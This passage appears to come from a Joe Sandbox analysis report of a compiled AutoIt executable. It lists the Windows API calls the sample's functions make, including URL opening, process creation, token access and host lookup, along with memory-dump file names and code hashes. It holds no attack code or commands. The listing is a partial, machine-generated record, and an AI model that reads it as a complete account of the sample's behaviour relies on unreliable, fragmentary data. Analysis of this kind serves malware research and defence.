                                                          • Part of subcall function 0013182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0013184C
                                                          • Part of subcall function 0013182D: InternetCloseHandle.WININET(00000000), ref: 001318E9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Internet$CloseConnectHandleOpen
                                                        • String ID:
                                                        • API String ID: 1463438336-0
                                                        • Opcode ID: 2d4ee5213c59f74a487af09f7329774b2f215b04fc9781c1630159bec9b33db7
                                                        • Instruction ID: 845e4ad175675acff437ca3c21ac2d5e5d5d94d377b5ac6e11814313e95bb05c
                                                        • Opcode Fuzzy Hash: 2d4ee5213c59f74a487af09f7329774b2f215b04fc9781c1630159bec9b33db7
                                                        • Instruction Fuzzy Hash: 9321D236200605BFEB169F60DC01FBBBBE9FF49711F14402EFA1596660DB71D812ABA4
                                                        APIs
                                                        • GetFileAttributesW.KERNEL32(?,0014FAC0), ref: 00123A64
                                                        • GetLastError.KERNEL32 ref: 00123A73
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00123A82
                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0014FAC0), ref: 00123ADF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                        • String ID:
                                                        • API String ID: 2267087916-0
                                                        • Opcode ID: e779e119f024fb0e121a25b2adde673aef318b25a28594cbb9e4b88e95a892a6
                                                        • Instruction ID: 0658827e9848c935e2802e1f793483645908c69019aaf91cdfe3fd7d1ac4582d
                                                        • Opcode Fuzzy Hash: e779e119f024fb0e121a25b2adde673aef318b25a28594cbb9e4b88e95a892a6
                                                        • Instruction Fuzzy Hash: BC2183785082119F8310DF28D8819AFB7E4EF5A364F104A2DF4A9C72E2D735DE56CB52
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00145D80
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00145D9A
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00145DA8
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00145DB6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$AttributesLayered
                                                        • String ID:
                                                        • API String ID: 2169480361-0
                                                        • Opcode ID: f0dd8ede16dc5d2165119e43a628f440d67a42f680891f6f8a1682095ce3a41e
                                                        • Instruction ID: 2b201b60c384e5ef8a239e250dbb2c36a3106784db891b81f5ffaa4988f2a65b
                                                        • Opcode Fuzzy Hash: f0dd8ede16dc5d2165119e43a628f440d67a42f680891f6f8a1682095ce3a41e
                                                        • Instruction Fuzzy Hash: 4C117C31605510AFDB04AF64DC59FAE77AAAF86320F14421CF826CB3F2CB60AD41CB94
                                                        APIs
                                                          • Part of subcall function 0011F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0011DCD3,?,?,?,0011EAC6,00000000,000000EF,00000119,?,?), ref: 0011F0CB
                                                          • Part of subcall function 0011F0BC: lstrcpyW.KERNEL32(00000000,?,?,0011DCD3,?,?,?,0011EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0011F0F1
                                                          • Part of subcall function 0011F0BC: lstrcmpiW.KERNEL32(00000000,?,0011DCD3,?,?,?,0011EAC6,00000000,000000EF,00000119,?,?), ref: 0011F122
                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0011EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0011DCEC
                                                        • lstrcpyW.KERNEL32(00000000,?,?,0011EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0011DD12
                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,0011EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0011DD46
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: lstrcmpilstrcpylstrlen
                                                        • String ID: cdecl
                                                        • API String ID: 4031866154-3896280584
                                                        • Opcode ID: c6410518ef5c076590785b0801e6b860730f03dbf1c645de698039bbc6ed3de6
                                                        • Instruction ID: 08cd7d1cb550c2d1b161bb7cab92373da70a7913f81e4446b2e3381094baf6d1
                                                        • Opcode Fuzzy Hash: c6410518ef5c076590785b0801e6b860730f03dbf1c645de698039bbc6ed3de6
                                                        • Instruction Fuzzy Hash: 2E11BE3A200305EFCB299F74E8459BA77A9FF46350B40803AF806CB2A0EB719881C791
                                                        APIs
                                                        • _free.LIBCMT ref: 000F5101
                                                          • Part of subcall function 000E571C: __FF_MSGBANNER.LIBCMT ref: 000E5733
                                                          • Part of subcall function 000E571C: __NMSG_WRITE.LIBCMT ref: 000E573A
                                                          • Part of subcall function 000E571C: RtlAllocateHeap.NTDLL(01430000,00000000,00000001,00000000,?,?,?,000E0DD3,?), ref: 000E575F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap_free
                                                        • String ID:
                                                        • API String ID: 614378929-0
                                                        • Opcode ID: 699700f5091f80324a3e3b36f1341894423aa38532471f7bb26361206fac0d36
                                                        • Instruction ID: 376822ee77019a1a4d464e98032064b9583531eda7c14191d1bcf2cede684f88
                                                        • Opcode Fuzzy Hash: 699700f5091f80324a3e3b36f1341894423aa38532471f7bb26361206fac0d36
                                                        • Instruction Fuzzy Hash: B1110A71504A19AECB312F71AC057BE37D8BF05363F144529FB48B6A63DF309980A790
                                                        APIs
                                                          • Part of subcall function 000C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00127896,?,?,00000000), ref: 000C5A2C
                                                          • Part of subcall function 000C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00127896,?,?,00000000,?,?), ref: 000C5A50
                                                        • gethostbyname.WSOCK32(?), ref: 00136399
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 001363A4
                                                        • _memmove.LIBCMT ref: 001363D1
                                                        • inet_ntoa.WSOCK32(?), ref: 001363DC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                        • String ID:
                                                        • API String ID: 1504782959-0
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00118B61
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00118B73
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00118B89
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00118BA4
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
  • Part of subcall function 000C2612: GetWindowLongW.USER32(?,000000EB), ref: 000C2623
• DefDlgProcW.USER32(?,00000020,?), ref: 000C12D8
• GetClientRect.USER32(?,?), ref: 000FB5FB
• GetCursorPos.USER32(?), ref: 000FB605
• ScreenToClient.USER32(?,?), ref: 000FB610
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0011FCED,?,00120D40,?,00008000), ref: 0012115F
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,0011FCED,?,00120D40,?,00008000), ref: 00121184
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0011FCED,?,00120D40,?,00008000), ref: 0012118E
• Sleep.KERNEL32(?,?,?,?,?,?,?,0011FCED,?,00120D40,?,00008000), ref: 001211C1
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0011D84D
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0011D864
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0011D879
• RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0011D897
Similarity
• API ID: Type$Register$FileLoadModuleNameUser
• String ID:
• API String ID: 1352324309-0
APIs
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
APIs
• GetWindowRect.USER32(?,?), ref: 0014B2E4
• ScreenToClient.USER32(?,?), ref: 0014B2FC
• ScreenToClient.USER32(?,?), ref: 0014B320
• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0014B33B
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
APIs
• _memset.LIBCMT ref: 0014B644
• _memset.LIBCMT ref: 0014B653
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00186F20,00186F64), ref: 0014B682
• CloseHandle.KERNEL32 ref: 0014B694
Similarity
• API ID: _memset$CloseCreateHandleProcess
• String ID:
• API String ID: 3277943733-0
APIs
• EnterCriticalSection.KERNEL32(?), ref: 00126BE6
  • Part of subcall function 001276C4: _memset.LIBCMT ref: 001276F9
• _memmove.LIBCMT ref: 00126C09
• _memset.LIBCMT ref: 00126C16
• LeaveCriticalSection.KERNEL32(?), ref: 00126C26
Similarity
• API ID: CriticalSection_memset$EnterLeave_memmove
• String ID:
• API String ID: 48991266-0
APIs
• GetSysColor.USER32(00000008), ref: 000C2231
• SetTextColor.GDI32(?,000000FF), ref: 000C223B
• SetBkMode.GDI32(?,00000001), ref: 000C2250
• GetStockObject.GDI32(00000005), ref: 000C2258
• GetWindowDC.USER32(?,00000000), ref: 000FBE83
• GetPixel.GDI32(00000000,00000000,00000000), ref: 000FBE90
• GetPixel.GDI32(00000000,?,00000000), ref: 000FBEA9
• GetPixel.GDI32(00000000,00000000,?), ref: 000FBEC2
• GetPixel.GDI32(00000000,?,?), ref: 000FBEE2
• ReleaseDC.USER32(?,00000000), ref: 000FBEED
Similarity
• API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
• String ID:
• API String ID: 1946975507-0
APIs
• GetCurrentThread.KERNEL32 ref: 0011871B
• OpenThreadToken.ADVAPI32(00000000,?,?,?,001182E6), ref: 00118722
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,001182E6), ref: 0011872F
• OpenProcessToken.ADVAPI32(00000000,?,?,?,001182E6), ref: 00118736
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
APIs
• OleSetContainedObject.OLE32(?,00000001), ref: 0011B4BE
Strings
Similarity
• API ID: ContainedObject
• String ID: AutoIt3GUI$Container
• API String ID: 3565006973-3941886329
APIs
  • Part of subcall function 000DFC86: _wcscpy.LIBCMT ref: 000DFCA9
  • Part of subcall function 000C9837: __itow.LIBCMT ref: 000C9862
  • Part of subcall function 000C9837: __swprintf.LIBCMT ref: 000C98AC
• __wcsnicmp.LIBCMT ref: 0012B02D
• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0012B0F6
Strings
                                                        Similarity
                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                        • String ID: LPT
                                                        • API String ID: 3222508074-1350329615
                                                        • Opcode ID: b4f0d39ab3bcbc4dfd540c7fa735825dd52efea1151506231c2785f041abbd10
                                                        • Instruction ID: 3e0196f661e13fbb166bc52992184b9fcb064d29e242ee3d062a12e583b76a27
                                                        • Opcode Fuzzy Hash: b4f0d39ab3bcbc4dfd540c7fa735825dd52efea1151506231c2785f041abbd10
                                                        • Instruction Fuzzy Hash: 5E61A471A04225AFCB18DF94E895EEEB7B4FF08710F114069F916AB361DB30AE54CB54
                                                        APIs
                                                        • Sleep.KERNEL32(00000000), ref: 000D2968
                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 000D2981
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemorySleepStatus
                                                        • String ID: @
                                                        • API String ID: 2783356886-2766056989
                                                        • Opcode ID: 1b4497981c73fd33eb3f881cdeae137ac67bbaae1d33af55c7911d8be0e60183
                                                        • Instruction ID: 590ddc836fffff7d6c7c60cda3b40cbcaa0e5134a2856797a82d6dc781c55802
                                                        • Opcode Fuzzy Hash: 1b4497981c73fd33eb3f881cdeae137ac67bbaae1d33af55c7911d8be0e60183
                                                        • Instruction Fuzzy Hash: 8E5125724187449BD320EF10DC86BAFBBE8FB89354F41885DF2D8421A2DF718569CB66
                                                        APIs
                                                          • Part of subcall function 000C4F0B: __fread_nolock.LIBCMT ref: 000C4F29
                                                        • _wcscmp.LIBCMT ref: 00129824
                                                        • _wcscmp.LIBCMT ref: 00129837
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$__fread_nolock
                                                        • String ID: FILE
                                                        • API String ID: 4029003684-3121273764
                                                        • Opcode ID: edb4e5e41e2297ffc9a94f058ccccb83a882b5f3d4a52a1d0ca04fef14535d1f
                                                        • Instruction ID: a9ee832e8c779c43eb5518079f954fa60975a4c3014dc9b1d67db3a4ab90d345
                                                        • Opcode Fuzzy Hash: edb4e5e41e2297ffc9a94f058ccccb83a882b5f3d4a52a1d0ca04fef14535d1f
                                                        • Instruction Fuzzy Hash: CD41B372A00219BADF209BA5DC45FEFBBBDEF85710F010479F904B7182DB71AA158B61
                                                        APIs
                                                        • _memset.LIBCMT ref: 0013259E
                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 001325D4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CrackInternet_memset
                                                        • String ID: |
                                                        • API String ID: 1413715105-2343686810
                                                        • Opcode ID: d7ce809dc8d2ed1302ca768b8118e2851c2a8311ee778a4fdce34177327d34ab
                                                        • Instruction ID: e3477043f650bd9319d475191c48e8b0c189d94a3109a75e529586f46a72d8a8
                                                        • Opcode Fuzzy Hash: d7ce809dc8d2ed1302ca768b8118e2851c2a8311ee778a4fdce34177327d34ab
                                                        • Instruction Fuzzy Hash: A331F6B1904119ABCF05AFA1CC86EEEBFB8FF08310F104169ED19A6162EB315956DF60
                                                        APIs
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00147B61
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00147B76
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: '
                                                        • API String ID: 3850602802-1997036262
                                                        • Opcode ID: a92fa45e08d5432519f18c917cbb450c5fa557ace99eda8f74412146215b5041
                                                        • Instruction ID: 1bcb9a896228e6a6e7231defcc78f22bb0ee8a776b89ea1720e7f3ad48b719c0
                                                        • Opcode Fuzzy Hash: a92fa45e08d5432519f18c917cbb450c5fa557ace99eda8f74412146215b5041
                                                        • Instruction Fuzzy Hash: EF41F974A052099FDB14CF65C981BDABBB5FF09300F25456AE904EB3A1D770AA51CF90
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00146B17
                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00146B53
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$DestroyMove
                                                        • String ID: static
                                                        • API String ID: 2139405536-2160076837
                                                        • Opcode ID: 51d78e33126d5050acc0947f7bac1cb4b0e643cb8c8c967e8fbade655fc63f97
                                                        • Instruction ID: e37e5e8e6f63cfafee1ee485deeb512ac5da01eaa32db49137ab504eeb1f6dad
                                                        • Opcode Fuzzy Hash: 51d78e33126d5050acc0947f7bac1cb4b0e643cb8c8c967e8fbade655fc63f97
                                                        • Instruction Fuzzy Hash: 8A316D71200604AEDB109F68CC81BFB77A9FF49768F10861DF9A5D71A1DB31AC91C761
                                                        APIs
                                                        • _memset.LIBCMT ref: 00122911
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0012294C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: 70f478be1499279e0056a6b1191488ecfd70d1ed01d9706462689adb0ba50fdf
                                                        • Instruction ID: bac326773c2dbd24b9c8dc6d12b90b90174bd260bb26226ed89f8f9db5894d77
                                                        • Opcode Fuzzy Hash: 70f478be1499279e0056a6b1191488ecfd70d1ed01d9706462689adb0ba50fdf
                                                        • Instruction Fuzzy Hash: C731C331A00325BFEF28CF58E985BEEBBF9EF45358F140029ED85A61A1D7709990CB51
                                                        APIs
                                                        • __snwprintf.LIBCMT ref: 00133A66
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __snwprintf_memmove
                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                        • API String ID: 3506404897-2584243854
                                                        • Opcode ID: d8b207ae89f2636c7983aef57d7f87baf766b1946970a00343299553d4767346
                                                        • Instruction ID: d9c66e9227941c05410a1a246c0560163e8e4f889e31ee07a8bf116ffb92e85d
                                                        • Opcode Fuzzy Hash: d8b207ae89f2636c7983aef57d7f87baf766b1946970a00343299553d4767346
                                                        • Instruction Fuzzy Hash: 9F219C30A00219AFCF14EF64CC86EEE77B5AF54310F504468F859AB282DB30EA42CB65
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00146761
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0014676C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Combobox
                                                        • API String ID: 3850602802-2096851135
                                                        • Opcode ID: 4337626a485cc4bc911e06a8a8665b780958a61333901fb54c1fda1fcf35c147
                                                        • Instruction ID: 49a16dac8535d75ebae66df65ad5cf5bfd86a9d3bfd696f52212dda62d3f9d07
                                                        • Opcode Fuzzy Hash: 4337626a485cc4bc911e06a8a8665b780958a61333901fb54c1fda1fcf35c147
                                                        • Instruction Fuzzy Hash: 5111B275200208AFEF118F54CC80EFB376AEB4A3ADF114129F918972A1D731DC5187A1
                                                        APIs
                                                          • Part of subcall function 000C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000C1D73
                                                          • Part of subcall function 000C1D35: GetStockObject.GDI32(00000011), ref: 000C1D87
                                                          • Part of subcall function 000C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 000C1D91
                                                        • GetWindowRect.USER32(00000000,?), ref: 00146C71
                                                        • GetSysColor.USER32(00000012), ref: 00146C8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
